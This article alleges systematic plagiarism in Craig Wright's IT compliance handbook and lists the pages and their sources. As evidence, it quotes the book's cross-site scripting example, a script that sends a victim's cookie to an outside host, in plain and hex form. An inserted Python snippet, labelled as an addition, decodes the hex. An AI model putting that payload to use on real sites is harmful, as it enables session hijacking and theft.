Craig S. Wright - "The IT Regulatory and Standards Compliance Handbook" Contains Plagiarism

Sat Jan 7 19:25:05 CST 2012


[Update: Beginning on January 8, 2012, Craig Wright wrote an original rebuttal, a second follow-up a day after, and a third follow-up with additional information (We take some issue with the third, but will not get into it here). In it, he says that he did not properly cite some sources, but also gives additional details saying that some of the material was originally written by him, or as part of a group he was in. Mr. Wright indicates that some of this material, in its original form, is not available on Google, so we cannot verify it. It should be noted that Mr. Wright has spent a considerable amount of time researching each of the points outlined in this article, and determining what happened. This includes posting a sincere apology to the XSS FAQ author after mixing up who to obtain permission from. Many of the points Mr. Wright offers rebuttal to seem valid, that he was likely one of several contributors to work that eventually got used and re-used, and ultimately ended up in his book as well. We leave it up to the readers to determine the culpability of Mr. Wright in all of this.]



The book "The IT Regulatory and Standards Compliance Handbook: How to Survive an Information Systems Audit and Assessments" by Craig Steven Wright (published July 4, 2008), tech edited by Brian Freedman and Dale Liu, contains plagiarized material. While the quantity of stolen text does not comprise a majority of the book, there is enough to demonstrate systematic plagiarism, typically in the frequent bulleted lists throughout the book. The more interesting (and confusing) thing is that the author properly cites some sources, but not others. In fact, the level or lack of citation could lead one to think that three people contributed to the material. We know that Syngress has hired Technical Editors to provide content for books in the past (e.g., Dustin Fritz and "Dissecting the Hack 1st Edition"). This may be a case where the two technical editors provided material, a task that is not associated with the role of 'technical editor'.

As an example of the curious citations, page 7 has three external references: (Cohen, 1997), (Dijstra, 1976), and (Dodson, 2005). The last chapter of the book on Cyber Law not only has extensive footnotes, but they lead to 10 pages of footnotes citing sources. This is a drastically different method for citation and only appears in the single chapter. These three levels of citation (none, regular, footnotes) could easily be explained if the author and both technical editors contributed material.

The Plagiarism

The following table details the portions of the book that were taken from other sources, making up enough of the material to demonstrate the problem is systemic. In most cases, the plagiarized material is in the form of bulleted lists of points supporting the section. Most of the text spot-checked appeared to be original, with a couple exceptions. This suggests that the author(s) went through considerable effort to generate original content, but got lazy when providing supporting lists. In several cases, attempts were made to obscure the plagiarized content, one of which is included in the next paragraph. This shows willful infringement of copyright and inexcusable plagiarism. Only limited portions of the book were checked due to time constraints.

One of the most obvious places that demonstrates material was not only plagiarized, but that the author attempted to hide the fact that it was lifted, is the section on cross-site scripting (XSS). On page 541, the second and third paragraphs on XSS are almost verbatim from the well-known XSS FAQ. As you can see on the FAQ, the examples of cross-site scripting use "cgisecurity.com" as the domain name. When Wright took this material, he changed that domain to "microsoft.com" in the ASCII representation, but forgot to also change the HEX encoded version printed directly below it. This same mistake also appears on Wright's blog post on XSS. From the book and blog:

NOTE: The request is first shown in ASCII, then in Hex for copy and paste purposes.

"><script>document.location='http://www.microsoft.com/cgi-bin/cookie.cgi?'+document.cookie</script>
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69
%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79
%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20
%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

If you take that HEX string and decode it, you get:

"><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
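Added here as an editorial example (not from the book or from the article's original text): a small Python check that percent-decodes the book's HEX line and compares the hostnames it contains with those in the ASCII line, which is exactly how the mismatch above surfaces. The two strings are copied from the excerpt quoted above; the function names are ours.

```python
# Added example: verify that a "HEX" (percent-encoded) copy of a request
# really matches the ASCII line printed next to it.
import re
from urllib.parse import urlparse

# Both strings copied from the book excerpt quoted above.
ASCII_LINE = ("\"><script>document.location='http://www.microsoft.com/cgi-bin/cookie.cgi?'"
              "+document.cookie</script>")
HEX_LINE = (
    "%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69"
    "%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79"
    "%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20"
    "%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e"
)


def percent_decode(s: str) -> str:
    """Decode %XX escapes byte by byte; anything else is copied through."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == "%" and re.fullmatch(r"[0-9A-Fa-f]{2}", s[i + 1:i + 3] or ""):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.extend(s[i].encode("utf-8"))
            i += 1
    return out.decode("utf-8", errors="replace")


def embedded_hosts(payload: str) -> list:
    """Hostnames of every http(s) URL embedded in the payload text."""
    urls = re.findall(r"https?://[^'\"\s<>]+", payload)
    return [urlparse(u).hostname for u in urls]


def check_consistency(ascii_line: str, hex_line: str) -> dict:
    """Decode the HEX line and report whether its hosts agree with the ASCII line."""
    decoded = percent_decode(hex_line)
    ascii_hosts = embedded_hosts(ascii_line)
    hex_hosts = embedded_hosts(decoded)
    return {
        "decoded": decoded,
        "ascii_hosts": ascii_hosts,
        "hex_hosts": hex_hosts,
        "match": ascii_hosts == hex_hosts,
    }


if __name__ == "__main__":
    result = check_consistency(ASCII_LINE, HEX_LINE)
    print(result["decoded"])
    print("ASCII hosts:", result["ascii_hosts"], "HEX hosts:", result["hex_hosts"])
    print("consistent:", result["match"])
```

Run against the book's two lines, the decoded HEX text names www.cgisecurity.com while the ASCII line names www.microsoft.com, so the check reports them as inconsistent.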

Wright even includes a link to the XSS FAQ shortly after in the additional "References" section, but does not indicate his material was lifted from it.

Pages / total | Description | Original Source
2 | Paragraph 3, numbered bullets 1, 2a-c, 3, and 5 | Verbatim from IT Security Cookbook by Sean Boran (1996-2003). Boran's material is covered by the Open Content License (OPL), but Wright's material does not adhere to the license.
3-4 | Job Roles and Responsibilities, and bulleted list | 90% verbatim from section 3.3 of IT Security Cookbook by Sean Boran (1996-2003).
13 | Definition of Internal Control, Key Concepts | 90% verbatim from COSO
16 | Ethics, and bullets | 90% verbatim from Ethics in Quality by August B. Mundel (1991)
27 | Terminology Used in This Book | List suspiciously close to Chapter 5 / p245 of Sawyer's Internal Auditing: The Practice of Modern Internal Auditing by Lawrence B. Sawyer (2003). Some definitions verbatim, some very different.
37 | Denial-of-Service Attacks, 1 sentence and 4 bullets | Verbatim from CERT.org
46-47 | Ethics bullets | (Same as page 16)
50 | BCP/DR Testing, first paragraph and 5 bullets | Verbatim from Wikipedia
50 | BCP/DR Testing, second paragraph, 5 bullets, and 3rd paragraph | Verbatim from IBM
60-61 | Planning the Audit, paragraph 2 and 7 bullets | 95% verbatim from MHMRA of Harris County Internal Audit Mission Statement (2005)
95 | Review Administrative Documentation, 6 bullets | Half verbatim from Appendix 8A: LAN Audit Guide of Information Technology Audits by Xenia Ley Parker (June 15, 2007)
96 | Network Maintenance, 5 bullets | Verbatim from Appendix 8A: LAN Audit Guide of Information Technology Audits by Xenia Ley Parker (June 15, 2007)
96 | Review system documentation, 12 bullets | Near verbatim from Appendix 8A: LAN Audit Guide of Information Technology Audits, with slight edits like "graphics software" becoming "drawing software".
99 | Review Remote Communications Controls, 11 of 20 bullets | Near verbatim from Appendix 8A: LAN Audit Guide of Information Technology Audits by Xenia Ley Parker (June 15, 2007)
110 | Rule-Based Authorization Checking, some text and 7 bullets | Verbatim from IBM
110-111 | Bell-LaPadula, some text | Verbatim from Protection: Bell-LaPadula Model by Harsh Manocha (2003 or earlier)
286-287 | Identifying Vulnerabilities, classification of vulnerabilities | Verbatim from Analysis of Vulnerabilities in Internet Firewalls by Kamara, Fahmy, Schultz, Kerschbaum, Frantzen
482-486 | Text, and bullets (a majority of the material) | Text is heavily based on but not exact; bullets are verbatim, including precise order in many cases, from UNIX Unleashed: System Administrator's Edition by Burk & Horvath (1997)
541 | Cross-Site Scripting, 2nd and 3rd paragraph, examples | 85% verbatim from XSS FAQ
545 | DNS Rebinding Attacks, two paragraphs | Some text similar, some verbatim from DNS: Spoofing and Pinning (no date)
593-594 | Vector Analysis, Goal 1 | Verbatim from Intercept a network connection for a particular user (2007-12-19)